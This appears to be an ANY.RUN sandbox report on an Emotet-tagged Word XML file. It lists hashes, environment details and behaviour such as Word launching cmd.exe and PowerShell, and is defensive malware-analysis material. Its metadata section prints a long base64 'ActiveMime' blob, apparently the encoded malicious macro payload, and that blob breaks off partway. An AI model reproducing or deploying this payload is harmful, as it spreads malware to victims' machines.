Malware analysis ATT06893577070808081.doc Malicious activity

analyze malware

Huge database of samples and IOCs
Custom VM setup
Unlimited submissions
Interactive approach

Add for printing

File name:	ATT06893577070808081.doc
Full analysis:	https://app.any.run/tasks/bbb6504d-f733-4e11-a7ae-bd5a9bd7d1e5
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	January 22, 2019, 15:00:51
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	opendir emotet-doc emotet
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:	AE683508038FA547703F55B4E1029BC3
SHA1:	0EB9C898980BD9B3505602E5032730C08300BDC6
SHA256:	7D61C977023CE16E7B7FDE414E15F5B37362BE72125795AC2B07586B812E1304
SSDEEP:	3072:uFntGJpjL/xSu90OoiLuDKZXfwKeljR1z:uJEhxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 2680)
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 2680)
- Runs app for hidden code execution
  - cmd.exe (PID: 2224)
SUSPICIOUS
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 3944)
  - cmd.exe (PID: 2224)
- Application launched itself
  - cmd.exe (PID: 2224)
- Creates files in the user directory
  - powershell.exe (PID: 2496)
- Executes PowerShell scripts
  - cmd.exe (PID: 1832)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2680)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 2680)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (31)
.xml	\|	Generic XML (ASCII) (2.3)
.html	\|	HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch:	360
WordDocumentBodySectSectPrColsSpace:	720
WordDocumentBodySectSectPrPgMarGutter:	-
WordDocumentBodySectSectPrPgMarFooter:	720
WordDocumentBodySectSectPrPgMarHeader:	720
WordDocumentBodySectSectPrPgMarLeft:	1440
WordDocumentBodySectSectPrPgMarBottom:	1440
WordDocumentBodySectSectPrPgMarRight:	1440
WordDocumentBodySectSectPrPgMarTop:	1440
WordDocumentBodySectSectPrPgSzH:	15840
WordDocumentBodySectSectPrPgSzW:	12240
WordDocumentBodySectSectPrRsidR:	005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle:	-
WordDocumentBodySectPRPictShapeImagedataSrc:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle:	width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType:	#_x0000_t75
WordDocumentBodySectPRPictShapeSpid:	_x0000_i1025
WordDocumentBodySectPRPictShapeId:	Picture 1
WordDocumentBodySectPRPictBinData:	(Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName:	wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio:	t
WordDocumentBodySectPRPictShapetypeLockExt:	edit
WordDocumentBodySectPRPictShapetypePathConnecttype:	rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok:	t
WordDocumentBodySectPRPictShapetypePathExtrusionok:	f
WordDocumentBodySectPRPictShapetypeFormulasFEqn:	if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle:	miter
WordDocumentBodySectPRPictShapetypeStroked:	f
WordDocumentBodySectPRPictShapetypeFilled:	f
WordDocumentBodySectPRPictShapetypePath:	m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative:	t
WordDocumentBodySectPRPictShapetypeSpt:	75
WordDocumentBodySectPRPictShapetypeCoordsize:	21600,21600
WordDocumentBodySectPRPictShapetypeId:	_x0000_t75
WordDocumentBodySectPRRPrNoProof:	-
WordDocumentBodySectPRRsidRPr:	0038126B
WordDocumentBodySectPRsidRDefault:	00200428
WordDocumentBodySectPRsidR:	005E6EE1
WordDocumentDocPrRsidsRsidVal:	00200428
WordDocumentDocPrRsidsRsidRootVal:	005E6EE1
WordDocumentDocPrCompatDontGrowAutofit:	-
WordDocumentDocPrCompatUseAsianBreakRules:	-
WordDocumentDocPrCompatWrapTextWithPunct:	-
WordDocumentDocPrCompatSnapToGridInCell:	-
WordDocumentDocPrCompatBreakWrappedTables:	-
WordDocumentDocPrAlwaysShowPlaceholderTextVal:	off
WordDocumentDocPrIgnoreMixedContentVal:	off
WordDocumentDocPrSaveInvalidXMLVal:	off
WordDocumentDocPrValidateAgainstSchema:	-
WordDocumentDocPrPixelsPerInchVal:	120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile:	-
WordDocumentDocPrOptimizeForBrowser:	-
WordDocumentDocPrCharacterSpacingControlVal:	DontCompress
WordDocumentDocPrPunctuationKerning:	-
WordDocumentDocPrDefaultTabStopVal:	720
WordDocumentDocPrDoNotEmbedSystemFonts:	-
WordDocumentDocPrRemovePersonalInformation:	-
WordDocumentDocPrZoomPercent:	100
WordDocumentDocPrViewVal:	print
WordDocumentShapeDefaultsShapelayoutIdmapData:	1
WordDocumentShapeDefaultsShapelayoutIdmapExt:	edit
WordDocumentShapeDefaultsShapelayoutExt:	edit
WordDocumentShapeDefaultsShapedefaultsSpidmax:	1026
WordDocumentShapeDefaultsShapedefaultsExt:	edit
WordDocumentDocSuppDataBinData:	QWN0aXZlTWltZQAAAfAEAAAA/////wAAB/DxQAAABAAAAAQAAAAAAAAAAAAAAACSAAB4nOx7C3Qc xZludc9IGj1GHtmyJRsHt0a2NbZbcr8fxoZ5SEIGP4RljDACNHpZI+sx1sMWAjst2bENMb4yIcSH BSIbwvrkAFEI4RiWwNgQ1mF5aANJfFgukR2W9c3NEiXk7OHuyYVbVV3dXRhIgOzZnJxzR67p6u76 /vr/v/76/7+qxlOvFU0f+/6Cc+Ciz+XABz78KBdkU88YUvAnBABL7j/86KOPnMcf/f/P39Tn/8KS Q8bQD69ZsKAxD8AiwJILSx4slbAUwBKEpRCWWbYJgCJYZsMyB5ZiWObCMg+WElhKYZkPywJYLoFl ISxfgeVSWBbBwsFSBksYlnJYFsOyBJalsFTAEoFlGSzLYVkBC0/4rILXlbCIsFTDUgOLDIsCiwqL BosOiwGLCcsqWC6DZTUsa7BtA3AFLFFYYrDEYUkQ2rXweiWpf/hXHZn/ns8m0Af/BuFY1IBeeO0H t1zsCv7kZx60GIdW/p9pmx5r+EnD428wPqT7+fazLVD7sS/U48c/AcAwTv9Zf6Zf50q/awMpKPNf 0j/L0Pr8vDjDZ187oeUq0JKFL9l/Aewf+WE0dz9v/2gOj/rtOlIGwvsIDWf+I5+AfIAz//OBPf/R nPivmv+I1hed/8gPOfNfALYPQHT+K+a/40scH1AHy1pYriJ9rCPXDfC6EZZ6cr8JeP7iWlK/Dl4b Ybkelq3kWRO83gjLTbDcDEszLElYWmBpBX8dn8MoP7AYPPIMEJaz7HguSBdn1/nAGAva3vH7oSEs BPX9fV3trYNZ16AhibLF2WzxmkfZvBy2mykOZM/OZWdbb04tuakIFLBXzV7N5s0DTP/AYFuor7v9 cnb+AHQrcJ71gW7QXg+NrxMsuQn4loOmK28VBEESJhVZqAQBvz8B8nxsITNbEBRtdzmQqoRyoTyx CjRdl+pt69s1AJoGbhkYbO+R/VKTr12qGuxuAeUb19VwsaFBq68nOZjq6wXNPsDurdnQ19+T7M6C FSvRD3pA8hqrthBwVlGuxSznmxK+2XnZP7N6AiC2t2xjR0eqdd+2jdWgw4LeoHVs2wNZ1qK7x8qu vFWqrgVGtaAkKtU4qI1VioIYrxyPV9eo1rZYzGpfoFhZ0sFt1tPb+pOgh6tNdbcPNEUTfT09fb3+ 7PUg1drfN9DXAd1rQ2eyv72tCWysrV2bqBE10LS+YWNV9bp12eUHQnvXc6JWJQS4jS2jv+LWpVom +5P9t1hLLDBvbDiwvqE2Exu4HBTGLP960ABq98UHFgM5Cqct21atAFWqqREra4Rqo5YRYpUG8FcC QdIEI6FU1wvxuBIQdgXbas+ul4R1FfGvcJn0y0svrIQzIixmQPUYe1vO2J4CJjEmCLvLha/Ex8oz BRZ4QBXAd4JW7oEMiJWqshaPyrGYXgmnR6VfSYBOQ1GFymhcV2v1eEaT/dWxg9q1A+39cJBi1evX bli7B4hNsXS6OjkIkk3r+lqT3U1gc3tPumlLvOZ5qGS9qn24LdD2zdW+aNgC56pqgv9jGiwIfa2K bT60vjj/idiFWfFf+cCcstPM9NB8MHo+JUcNVbwSeqNgigEpA051ESyYeyBbOpS9EPmouqw4I479 2yPQlV369TAzyvLH81//QTjsz15xHJQHd2qmrjLwCv2DCfQrmoPlwbivPHilb2VwycqilcHW0bKq YKesbBaF8mBn8wKFWyDc3LbAaXMsveDHyytaF0QuBEMtbgxh5sHqDHImsNs34HUdazviK+H93/k8 Jzs99OMK9AbVD8LyJKpjMo7btick+FKfELBdOHLfOcBLwxkmQO6Gge3Q/+TH7n59Dc2M820z+0tA M/vX/KDowIKGelRHKm4IubViu8a6NYd7FtwLo8at0MNrMEJI0IDi0OvHYFTRYPSohaUSlgSMHCas GfC9Af8qYRsVRgYV1mvgsxhsUQ3RMbAb0rKjtwQRBrzWwtYqjOka/EO0quFVhbUYfG/XamG9Gttg DKIEeBUxN7uBo1eG6US8Wh9+JOChJbIyn1xloTqKqChqsqNe7Ggk7YVPbV+A26P7UnfUWXAxbaf9 p+le+Iznn8bfnx5Fu/0v/5xh/qnPhy8xruJoayfm8NYkiA0O9qdahgZBO7clfvOGZA+srOHCcK5z ohAO5uVNx5PsAJsWbq3VdGgV8epYpaZAc6hUEoYJPapoGJXVag00gBoxlqiWYv7dt4J9kmkIcLyh d9QqlWpOUytjJgjUwuHVzJgkmGJA03cHz1zZ3deyL9nNHGhIJ1uZPq422T3QXnBHoj/anhxMtnTP XVRvwdjQ3tqdBNnVa9vA1Ob+oWC8pnk43TfQziwsEjYD6Di7k4Pt1aH2/tTOe2Ynhga4wb6e1MjX q/8SzcFPCtqq7Uq/3KfgS+S/HCwbSf5JvDHO275s/8jxOU7v82BQLvuNhF2/Gf41gE0wl7v5S+Xg oS8hvwRLRfYn+/8yY4D6R6RQnv55+78all5SR/ErGwWoeVCL78AHv4b1aljfBMvDH4tfr/8AdfEg 89nxa7XtSh40G0tKq2LfeHTL0YcvXf/czu/ffSp+z+vrnnr4mcjxujO/uJgdvK2Uddv/3rKyb8Md S1+f/7Nr3z4QAp8rnl0Mu7jrv8F4Fkb1i+IZeQZXNqTmcM/AhFwEG2BujZNcmGFXgc0wwU6BARhj +uCqYgg+b8cre8dCGGYC2NEFfT5vdHHu2b02LgCfNFOtP4mzo8zYRIRFzxBqHEto1z+rPbpv/php fJyni/v6U89RFDUoQ4sC4nRyQM6nj0EArYJgA3s1wyyGS88mODk7yN9y+HIVdFXtcAqrcEkjwJIE v2RcDpWLbfsLfv5MKPv2Z4aylGxwqkiFMhGvgEB31ebO1EB1X7R1qKe9dzC45UoORiMYjO5rSPth NOrGwYgpOJ7ox8GIRdEIB6PFKBrBYPStzf0sikZ2MCpeuNkORdH2ahSK5i5OWEMDOBTtSzB7v7gH +8bVy7/H4PTVHj8GW4hdcz6Mm50w0CF8+h+D7Xt5U8Je+fVfC1e1wAJegUO/B3qTPcxnFGgsX0Vd oA2MXNKZky87u+OL319xxPfLpzY+Fnr0n+b9a9kF2Ckki8o77nYKGiof2HtHO6HCglsIGWfqAvB/ HHECn23Iy4j8PvBJ40+Sd9kg5uVtH/tc7/v05yn/RQ/c9UsxWb8cZOz+LoH3i1Y6UiH/3zqK3jiE /xrrl88Q1vv8Lfl7miuHe3wPn+TPrmKjn1Dtxz20cy0gb2/Abw5hLeXPfo+1viB+28fwz/gyXxB/ 38fwv/Z/XM7Pxjsf2zL3YbwffNKQPk2Hmc94frGeL+bh8yD+4jVJCxMfDXgHaLCORAyQOtpEDZE6 asPZ9Vz0PkKeo41XgdSR7Uftug9h6yhsI4Vtpuh3UthhgkU0LQo7TmGPUv1OUNhJUj8JLycp+mnG o2MxHp2DjEdnnPHoTDAe/yco7EkKm2E8+mco7FnG43+aws5Q2A+ofjGIYEOkfhheSlmP/gmW4oGl eKDanKHonGUpHijsDIX9gKV48FE8kDrKnUt9lJ59Hp1Jn0fnpM/jIUPRmfJ5OjxLYS9Q2BmK/gcU NuD3+A/5PSzn97ARP2V7fsr2SB1tXtf5KR1SdE5SdDJUmzMUnbMUD9MUdobCfkBhcUhwdJjlYUuz PGwky8MKWR7WoLB1pH4bvNRneTJOUXSmKToXqDYzFB3ckOg/kO1hS7M9LJft8RDJ9rAGqT+A9Enq 6LBjGtb9zhih8GfZuQNyRo4PCeUA14eU5nj0uRyPByHH48Gg2kRzPB7qczz+GylsJ4VN53iyD1PY gzme/scp7ASFPUH1O0lhM6RuIXug6NcFPDqNAY9Oc8Br0xnw6AwHPP4tCjtOYY8GPB4mKOwkqaNQ dZKi35hL6SGX0kOuR2c4l9JDrsfDOIWdoLAncj36kxQ2Q+o7kR4o+tE8j059nkenMc9r05zn0Unn eTwMU9iDFHY8z+PhKIU9QepbEG9Um0A+Zc/5lD3nU/acT9lzvsdDlMLWU9jGfI9+M4VNU9hhCnuQ wo5T2KMU9gSp70P8U7wZBR6dugKPTn2B16axwKPTWeDxkKawFoU9SGHHKewEqd+B+Cnw+DSCFA9B iocgxUOQ4iFI8UBhLQp7MOjRH6ewE6SOfPIJin6gkBrHQmocC6lxLKTGsZAaRwpbT2EbC6lxpLBp UkeHnMOkjja4zhZ6Pi2ETos/xaeVzgKuT+NmefQjszwejFkeD9FZHv91szweGmd5/DdT2DSFHabo WxR2nGCxjVHYExR2kur3JIU9Q+r3wssURT8dosYxRI1jiLKlEDWOIY//ExT2JIXNUNgzFPYshZ2m sDMU9gMKi0/snXEp8sautMhrM1zk0TlY5NEZp9ocpeicKPJ4mKSwGQp7hsJOUdhpCnuBwn5AYfEv DBwfNdvDlpI6ylu52dQYzfbonJnt0Zmi2pyl6FyY7dnADIXFv2og2MAcj4fQHA/LkTrKLSNUm5Nz KB4oOlNUm7MUnQtzKB4oLP5VhcNDMcVDMcVDsafDSLGHNShstNiTvY7CNpI68mPNVJsZig7eFHF4 mOu1Cc2leJjr8R+ZS/FAYaNzPf7rKGwjhW2msGkKO0z1a1HYcVI/jmySoh+d59Gpn+fRaZzntWme 59FJz/N0OExhD1LY8XkeD0cp7AkKO0lhMxT2DIWdorDT8zz9X6DaDJdQPJRQPJRQPJRQPJRQPFDY DIU9Q2GnKOw0qVuIB6pNZ6lHZ7jUo2OVem0Olnp0jpZ6PExQ2EkKe5LCZijsFIU9S2EvUNgZCvsB hQ3Mt+uHkE3O98Z3Yj7Fw3yKh/kUD/MpHuZTPFDYCxR2hqL/AYUNLPBsOLTAw3ILPGxkgdevsMDD Rkl9M7zUkTr6kdLEAi+GTqPnVAyl62GHT4JFP7Cauai9G4svcTaaOFi7h+xN/gSG4DTiFijsYiCx DKgAAtsO7zX21/D5I+AJ39WQPw6sYhsLKoDB9oJt+GDho48MjItC3OUYt5qtgfdxgmtkbVwdfF+L 31ez2zAOYNw6TO8qtg22SsL7DQR3P2PjNrGNxRWgng2DNtIf2vl4Euq/dVXTLkWV9aa2J8EsoBq6 2DSomYreVFXVVAXyYZt8UIVuduGfD+EnBWDA+RGR1NSKngRBT1tV+3A7t7KVW1Lfj1sVgr5t/cme 6uRgctUegRfzcX9L4Gv7ObrPBfityUtLMCYbcCu3rFqZyIe8h8FisAXKip5ngYH2QW4Y1ivAZpYD TVAPW7EeGlkk/01E3uuJnlrYRr4CNJOtTiRvI9ZThzsubRjXSXDfIuPS7dLtYm0ch3FpTK+X0ONA P8HVABu3k21cWAEGqf4uMADrYNvImjX9txpmuqrvsm03I90NDkUrVb1zYKSlQrN1Uru2dVm8PXlL 9WJ0z4LUOiT/io/J37RB6t4ObJ1dVb+EU668PtIDbLxct3n31t6GVV3D6H4W2Ljp6prYyut2ih38 rmuFBNbaMJZ3D5TvNizfCL63iBx3EDn2ufY15sjPoHYH2UauAux35b+D4H5G7OswWwoxh2j5iX21 rd+zdGlHXz+35EkQAD1cqpeLqLwth87rIq/IvELsReJ1iZd0XlZ4SeFtS9MVXoXtdF60UQGgC7xm QJj9nscUVI3XZN62VliH/yABTcCSj0N7uZtdAGt3ufzfQ/j/GuH/Pij3vVjuo0TuCG434errAayv 4wT3NtHXw3jePcQO4B0ihEO7Rhz4LttYXQFOsPE8u79HCC6f2Nkk2xiqAI+xsTxHX2inCumLl3X0 T1N4NJI6losoQOHJfFRU3lECsQBe1LEaJN7WJARBqCLZUKSFxzH/J6E8T2J5nmCBxYGnCV/XEj08 675/Br7H44/lOY3tO8PyRJ4XCO4eMt/OuPPqRaK/C7i/l7FdvOTq/VWCu4H09wbE/RTjpth3P0K4 SRZg20DiqgKU077DwvKyCWxvA2u8ovCyxIsST55BA4GmpKJ/Ak/8lCTyuorAokbsSUHv4WMDgm17 wrqDT5GWfs7mYD7fxP7yLHvnjTbfbxG+DxC+p7E+3objh7wp4vsDPE/ece3oPNbvuwR3C8H92vUv F4h+M9hPFGAJdRlyrqo84koy0OQQFWLlOi/BVwYPH9s2IKm8KGId6MQq0Dv4CFqM5mgJPoEwOIWg ukgrWUZPVYQmOsKq4BUBqdvWiCQhVtAMrAC/weOIfO4wmw9r4/j7cfz9c/z9Gxa1q4LxKoXsH6B4 GHXj4TTW3x+g3L/Hcs9gev9B9LKH2M8f4fv/xO8/IPZzAuOAz/aBFeBDjGN9Ns4k8yjbh/yy3zeA Yj7G2fE3z4fGL+Bzxq+A4FaQcQj5HD9X6Ot14y+yNAEZB7QIEd+JSKMqnEXEQ/Gaiv5JJmoi217M RDYIFerMRZnXdDwWvO2NRahfGdGR4ZzlJUIJTmFeMRExODYa0uBsHwfm+RoDFfgU0ea7lPD9GPE3 C33IbyzweX7WykHtOJ+TN1yK52uY4L5J9BSB75f60PvFxE/V5QBsDxqcNCo0f+Qtsc2gkYeMCq7N 5AHIuyhjpeR/ilbyHa1Ae7WfBGALHVmiYuNNpA4Tac22S81EGsE6JFaYhywc6lDjRQPpYrnPlr/K Nx/e8a4+BCLXm0QfimsfEpErnY3arYLPDSyvhvWxmuA6ib1FfchvX07pEe0qo9FCXEJGoNdAM4e3 Iwp8hJh1Ri+fGj3d8T68KmKtQc/rjDFSkyQjVcBoJJF4hmaxKCAbEZGkccxfrc/xn9X4vo7w20v4 Xedz/ORVRM6DWahdvc+ZNxswbhPBtZNx34LnwWZKTrRrj/2HM6Qij/kiI4qH0h5llccuRnesAI4a VACyVyfmSEhHmor9RCPuvwnrdas7XjcRfi4j49XiytlM5EAnHDAvc5+3YTqdBPcDMl+7fcjfdlFy HMS4tIvrxbh+gvsHgtuJcYO0/H5bfjQoKp6Shj1WMPVQoO8U0QjKxO55PDEM2+4LoW+AOhBt7ymT eGKr0NaePd91z0mgee/Yt6TaJo7jzDCx79vccR3B/O8h/OcSfY2542sRfY3jdvvd+bwP3x8kuAix l0M+x9/eQXCNOL9A0Y7Hhuz4IDjj8MzUVBIzFB1LqSN7JvkmzMdUNF0Nd75DXYnIU2hEOh2ZNDJ1 1ZHWIPbleRDbwJD0h137uAv7s3H3/m4ih0Ls96jrp+9x5Mdx4D6fE0fvxfI/QHCFBHfch/KOCWrc G1kyv+3BgaOIIqhuZxdoziOWiTQqnvwoAts6gQ3RUMKJq5lOZqFhl49dgIRkegjzccLn5IsP23kg 4auW2ONj7rg94tg/zhsed/3YJMY9QXDziTwnsTxP0vaP84YggMEFcargRNGOLALmHmofiWj7YxkN ligSm9U0lB1KONSRuY1SZiwPkuVpdzxQTFruQ1E+jr8b8fcw/j6Mvx/C30/7EO49kuelSP5/T8By 84CzmF4Gx7dnXfqniZxTRD8v+pz86QWinwnc7iXXDs5g/bzs+AcyT6awHb1K6acT497A/u+nbn8/ J7ibSH9vuuNxlvQnANtO7JCtGDgdwJqdhbJJSbPTJWgLKrEWASWXOK20rQWrFWYAElqykOggQ5Dh pJ1kVqEQAEGqAGy/gfIvREmBSaBCcv0A6hMhsY295Xv3o3fffReuSaexn33bdx7/1IID54lcvyH6 eNedH+/4PsJ5Ndrdh/mnmydc8CE6vyG4JmJnM64/fc9n5+Mcxv3Bjae/96H+/oPgdhI9/qfrxz4g uAuFJK9VHLF5EWlLIim6LhN/A0XGGoNzUHHmH27DuzHTwSNbR3r4o6sH4HfG70MsD+u3+Tru5Id+ x3/6/bYe0GkMzA/d5wE/kqeA4OLEf4b8bn7ot+UpxbhivzO/Z/tRf/MIbpj0t8CP7LCU/GwH4aaD 9jxV0DyVoKhQEAl7URxHoA2ouruCEfFURs5IVt24AQ1Ac2YqtEsVUXBMx0HapiPjlY3mZB8oz8ep FxoAstaBDkzHmWkFWOiHeaPfsZNLsR7CRJ6fEjta6nfWg4uJ/kJBpIflfrSejvidceAJ7iWCE/zI Pqv85109nC2w82vEjokcE9YBWnrhsdWd9YnoLNckyVmfoEWOjJSlKGTmOOsVV0dkwSI5vlnCQRmF d1s/ErYfe53H410BCY+f5kfrdMWVwyBy7CPjudqP8odV1HiGCvA+nR/th1xOnkPvSHBvkvlQ60d+ p5rQxfLnI9xVrj7rcP/rCK6S9Ffvd+bfBqLviXx7HtnLQzjG0LfYebpIIpBOstIgzLNR2irjDMak rMBRsajmu2tNrGG4vKZ07M4wZGfEXh1/h3W2ydXTFr/jpzdju2kkchwi49/kd/KPrUSOs3lI/mY/ imM3uXRaCG6IyN+B37dRepvAuC6sz05X391Of0TfaXc+95L52pln5zsoS0dS4ZxXQnXsbYh3tTcH FGdNjV02dlfER6NdJNP1xvlAwcqEwVYynDU2MjS8XyUSqrOAPYldlToxgPd0qmF99rvy7MR2Ngjn i62XYSLfWiLfbdivjFB6Qb+e4IDld/KGPXgcxgjuNNHnfteP7XP8H8bd4eIOYjs8RHC7CG7cxR0m uNJc4O682BsIJl4jo5UPmlgK0oLpyIo0oNhunqyQcu0cBP6TiJZwqJOQ5rAfdHJLHU1tlD4qrgVj 3RKlIr3d5drPPa6d3Y3lOErkyCZ+/D6/E5fudeQP4H09V74HsN6OE1yK4B527fshx/8H7HWDN08U og80pPYEc3N9NL+wZdkS4B0paFa2LZKYptrmgIyN7H4KPJYSBUJnJwYqWkb/kNQnoL9+xO/E7+9i vh8jfN9O5t3jrj+fJHw34/2BJ/1O/H4C6+kkwRUTeZ9x/dLTRE8RjMu4uGdxf6cJroDgXnRxL5D+ ZrJtfyXZuyQ4B8W7INBNEWFQ+uRoSkZBDM0J+14iuYAjP3wJlSc6axON5FCGtKyNzOA+Dp0MbNhq W8+asg1by8qGt42s2oNn2Bm/Pb9e9qN9hJfc+fUqkeMYkeOnrv+YInJE8D7Cz11//AaW/yzBRcm8 fAv7qzep+DCD1+XTuL+3XTs9T3BhJz9z+3uH6Ptklu2vlvTwYtnSpSlU7+CW9HDbBvtti+EMkWtv 7ezjyhxpVy2H0q4pu621B2nj4ycmAMt/gcj/Fszj/4gz9YV+9C3h7034ux9/34W/T+DvM/j7gh9R eAbmVSifR78UvMefIXl0FcvBbB+1egZTnYHyvOdn0X4h7LEP5X9++4Rs2u/+x4uspz7rP17s1Ezo isPBvNqhXtCK/gc616UCVTIiy4J5G0EvV9Pf39fPhTa1DwyByQ3tw2AwmDdiCJLMgPTG1sFIlyn4 FQlsamjvbm8Fg1wiOdDO9VqirCjBPC4LMGzEVIxg3pDoNzTGTKzr3RbhBkzZUMGqmt6CNs53OSt3 aIrJSuDGdX3bIn16wFTlghv7RFktB1fl36gJAvMt2WQFYCb6BiI9xkFDM0JNiqizRTEmmpIFXTtU lQppsq7feaMiylYwr0sTNG20yqpu6Y60auqdVaERWTdHZ4VbVwHn1A2EuRVcWDV04By8CejkbSzX 8lU1Re1Dt7Ec73/tB6SmVjaATtuAc9zG9o8F7CM14Jy1rWFzl1hBXz6bMxY0eb+0ZCwbH6yxCSYr 0dkfkZWxZaM1+EwtOuIf0dmrGlK9kZECXWWSP+lrNQWR1V6JaoIYzNsZ0ET5dF+8r687Guk2ZEN8 rbGzVNZlJj56YIciZyujgdtL+iURYu8sMUUzmLdDydbihaeWdOuSap6aVdKvirIRS8a50l2Gwebe XjIii4WGtfzlA9GSVk1Qfaf3RK9pj2xXNKPoznSXZOxNbxtZA5xzs8Bl224+3YCOzYBzbsawfnJo duaW6sVjvtS6UebUVr8in96KD8qYsWxySOaP9MR9+ICMwydkY76Nm4BzPMbZ52Pbdph+Q40aDTv6 I30jxmvP7Yq+suEEqImeUM+Kmn6qNvPcTpCMvVpW8ItOVReTcqIhOtgf6TSkw/LOOtOQe69QtEzF roBpilZ+bWo4wqUV0dS75VbRrxmxRBidghUs7Wje/6t6dAQWQmdgY1/ReT1qH4AdZyTgHH6FUDbh 98OwWGT5YdK2JFvgtXlGNJvN5sdy4Dp9tSY/nxVlosDK0YQyUNEp6hKzumFbMrNVVWQhWrwskaxT Ja3qgGw0X5IKyJKRPBwb7I2EOiVdndzaqxgFgjK96JTUa4pG2St3pQ3BeFWSJEsK5rVIulxWkRx7 oF+WleTh30gjfkU/LcVvGWyPHOyRhFfu6pL0pJD79a26Hi3pECV1NFaSaIDzqYW7d35Q7jEm7gMl YV7+XbRS57WaytORhyrb2HqUC+RX6adUNVt6vjJThY+nEq0KV9WlmMa5eZutZG+kW1J0pstcVrVT s55av5sbC+aV7tKE+HhZTpeqPG7W7x6RowYoSZwf2t9i1QdfGTFVoer2dzStuSqpZQ405yTHx3s0 0axP9ioT9yWifmZrq2goh2pGNujT0Y0l0dV9+jFzk9U31NsWGVQy7Qku5yfmLs00ymrCg7w4cb3A Ld973flG3i+bDzL4lGkaR/x9K7ibQGuxyjcLwvOVMAo9pKunbhY1H6uM+v59gjWmsx8MiNOyxUZF YYdmKA/+Xeb1fm2fITz69KAoqO8d3yebHNOrGap0bXJsXpekaUfkhcu7ChT58evLpO2KKbYml74E nZ72bOnjg10Fhh4PX3Njj6IIJT8qbTZ/z4SPFcL0qQ4ufF64QjJ+FxfLXo+j7H+CMfjn65nTs9CO FohFiz/Unw9ZDGCaK31bR9mQ7yUdsOb7c2RZZKayXhJ9g/xoMa/UZ80tuZVbGy3lj1WK49NlrbtX 